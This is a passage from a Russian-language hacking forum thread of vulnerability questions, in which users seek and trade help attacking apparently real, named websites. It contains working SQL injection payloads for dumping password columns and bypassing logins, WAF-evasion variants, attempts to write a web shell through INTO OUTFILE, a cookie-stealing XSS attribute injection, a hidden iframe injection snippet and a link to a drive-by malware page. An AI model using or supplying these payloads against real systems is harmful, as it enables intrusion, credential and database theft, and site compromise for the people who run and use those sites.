Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    этот код в php должен быть в php-тегах к примеру

    PHP:
    echo "<iframe src='http://site.ru/' width='0' height='0' frameborder='0'></iframe>";
    и чтобы не нарушить структуру синтаксиса, html-кода, заменил двойные ковычки на одинарные.
     
    _________________________
    3 people like this.
  2. Hack_Master

    Hack_Master New Member

    Joined:
    7 Feb 2011
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    есть sqli, на сервере
    - root
    - File_priv=Y
    - путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный)
    - вывод ошибок выключен
    - mq - off

    а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает!
    когда ввожу полный путь - тоже самое.

    при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть

    когда вбиваю путь до определенного файла сайта - также выкидывает(

    что это такое и возможно ли решить проблему?
     
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Просто прав не хватает, скорей всего или мускул на другом сервере.

    Только если ты указываешь файл без пути типа outfile '1.php', то запрос должен сработать и файл 1.php должен создастся в папке с мускулом, на которую права, разумеется, всегда есть. То же самое и для /tmp/. А passwd читается?
     
    #18303 попугай, 11 Nov 2011
    Last edited: 11 Nov 2011
  4. zapadlo_zapa

    zapadlo_zapa Banned

    Joined:
    18 Nov 2010
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Чем слить базы быстрее чем с Havij 1.15 ???
    А то так и с ума сойти можно одну базу сливать целый день.
    И если база больше 5 метров он **** вообще виснет.
    Кто чем сливает базы большие ?

    Щас пробую rsaUnDumper_sql__2.0
    Перехватил снифером запрос с Havij 1.15 при сливе базы .
    _http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271
    Как его теперь подправить под rsaUnDumper_sql__2.0 ?
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    хавиж работает с выводом через ошибку..не знаю как rsaUnDumper? если работает то можно..если нет то писать скрип...или же исползовать скрипт от Пашкелы..на форуме найдешь
     
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    WebCruiser работает довольно быстро

    http://forum.antichat.ru/showpost.php?p=2430589&postcount=6
     
  7. SpaceMan

    SpaceMan New Member

    Joined:
    5 Jun 2011
    Messages:
    13
    Likes Received:
    4
    Reputations:
    0
    help me
    http://www.mobil.ru/profile_notes.php?product_id=4'''410&&n=-13
     
  8. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Реально ли слить сайт или залить шел в данном случае:
    Путь:
    Через Load_file не получалось
     
    #18308 DJ ][akep, 13 Nov 2011
    Last edited: 13 Nov 2011
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    и не получится..прав то нет у юзверя бд на запись...
    шелл залить есть возможность ,но по другому
     
    2 people like this.
  10. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Отпиши пожалуйста как
     
  11. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Нашел Xss в input.
    Фильтруется < и +
    Такое работает
    Code:
    /?search=test" onBlur ="alert(document.cookie)
    но дальше пробиться не получается.
    Подскажите.
    Вот что имеем на выходе
    Code:
    <input type="text" id="id" name="search" value="test" onBlur ="alert(document.cookie)"/>
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    < и + тут не нужен, весь код помещаем в событие.
    Как - или пользуемся найденной sql-inj, или ищем что то другое.
     
  13. Shimon

    Shimon New Member

    Joined:
    5 Oct 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Добрый день.
    Есть логин-форма.
    При подстановке кавычки в любое из полей выдается:
    MySQL-Error блаблабла
    SQL Query:
    SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')

    логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
    Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет
    SQL Query:
    SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 -- ') AND (BINARY password = BINARY 'admin' or 1=1 -- ')

    если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
    Как тут можно в эту BINARY инжектнуться?
     
  14. gigan

    gigan New Member

    Joined:
    3 Feb 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae

    я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?
     
  15. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Всем добрый день.
    Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...
    http://powerdefence.ru/Uslugi_dlya_Yur_lic'
     
  16. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Как обойти фаервол / фильтр при проведение SQL-инъекции?
    Запросы вида: =-1'+order+by+10+--+
    =-1'/*--*/order/*--*/by/*--*/10--
    =-1'+OrDer+By+10+--+
    При всех этих запросах пишет: Соединение было сброшено
     
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')

    2 aydin-ka:
    =-1'/**//*!order*//**//*!by*//**/10--+

    Так пробовал? Все зависит от того, где именно происходит фильтрация.
     
    #18317 Cennarios, 14 Nov 2011
    Last edited: 14 Nov 2011
    1 person likes this.
  18. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Пробуй GROUP BY
    или тупо
    UNION SELECT 1 --
    UNION SELECT 1,2 --
    UNION SELECT 1,2,3 --
    UNION SELECT 1,2,3,......,N --

    В оба поля: ' or '1'='1
     
    1 person likes this.
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Code:
    (-1')order(by)10-- 
    
     
    1 person likes this.
  20. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Если у тебя поиске "Результатов не найдено", это тоже скуль? =/
    Вроде бы ясно сказано.. ещё и крутить собрался.. распечатай, и крути, запустить можешь даже.
     
Thread Status:
Not open for further replies.